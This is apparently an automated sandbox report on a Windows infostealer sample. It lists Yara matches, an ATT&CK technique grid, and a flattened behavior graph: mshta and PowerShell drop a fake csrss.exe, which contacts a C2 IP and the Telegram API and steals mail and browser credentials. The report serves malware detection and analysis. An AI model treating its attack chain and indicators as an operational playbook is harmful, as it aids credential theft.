                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.28550a4e.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.3.dajivhqI.pif.26abd218.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.287c0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.2993e390.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.dajivhqI.pif.29916458.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497539381.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495630239.00000000287C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2497929209.000000002B4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.1383089164.0000000026ABD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2495714250.0000000028AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dajivhqI.pif PID: 7196, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  12
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts112
                  Command and Scripting Interpreter
                  Logon Script (Windows)1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares11
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell
                  Login Hook311
                  Process Injection
                  4
                  Software Packing
                  NTDS27
                  System Information Discovery
                  Distributed Component Object Model1
                  Input Capture
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets241
                  Security Software Discovery
                  SSHKeylogging24
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials41
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Masquerading
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                  Virtualization/Sandbox Evasion
                  Network Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636658 Sample: mybestgirlfriendwalkingarou... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 56 reallyfreegeoip.org 2->56 58 api.telegram.org 2->58 60 2 other IPs or domains 2->60 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 78 21 other signatures 2->78 11 mshta.exe 1 2->11         started        signatures3 74 Tries to detect the country of the analysis system (by using the IP) 56->74 76 Uses the Telegram API (likely for C&C communication) 58->76 process4 signatures5 94 Suspicious command line found 11->94 96 PowerShell case anomaly found 11->96 14 cmd.exe 1 11->14         started        process6 signatures7 98 Detected Cobalt Strike Beacon 14->98 100 Suspicious powershell command line found 14->100 102 PowerShell case anomaly found 14->102 17 powershell.exe 44 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 54 192.227.228.22, 49711, 80 AS-COLOCROSSINGUS United States 17->54 44 C:\Users\user\AppData\Roaming\csrss.exe, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\...\csrss[1].exe, PE32 17->46 dropped 48 C:\Users\user\AppData\...\xzofjfee.cmdline, Unicode 17->48 dropped 80 Drops PE files with benign system names 17->80 82 Loading BitLocker PowerShell Module 17->82 84 Powershell drops PE file 17->84 24 csrss.exe 6 17->24         started        28 csc.exe 3 17->28         started        file10 signatures11 process12 file13 50 C:\Users\user\Links\dajivhqI.pif, PE32 24->50 dropped 86 Antivirus detection for dropped file 24->86 88 Multi AV Scanner detection for dropped file 24->88 90 Drops PE files with a suspicious file extension 24->90 92 4 other signatures 24->92 30 dajivhqI.pif 15 2 24->30         started        34 cmd.exe 1 24->34         started        36 cmd.exe 1 24->36         started        52 C:\Users\user\AppData\Local\...\xzofjfee.dll, PE32 28->52 dropped 38 cvtres.exe 1 28->38         started        signatures14 process15 dnsIp16 62 api.telegram.org 149.154.167.220, 443, 49719 TELEGRAMRU United Kingdom 30->62 64 checkip.dyndns.com 193.122.130.0, 49712, 80 ORACLE-BMC-31898US United States 30->64 66 reallyfreegeoip.org 104.21.16.1, 443, 49713 CLOUDFLARENETUS United States 30->66 104 Detected unpacking (changes PE section rights) 30->104 106 Detected unpacking (overwrites its own PE header) 30->106 108 Tries to steal Mail credentials (via file / registry access) 30->108 110 Tries to harvest and steal browser information (history, passwords, etc) 30->110 40 conhost.exe 34->40         started        42 conhost.exe 36->42         started        signatures17 process18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.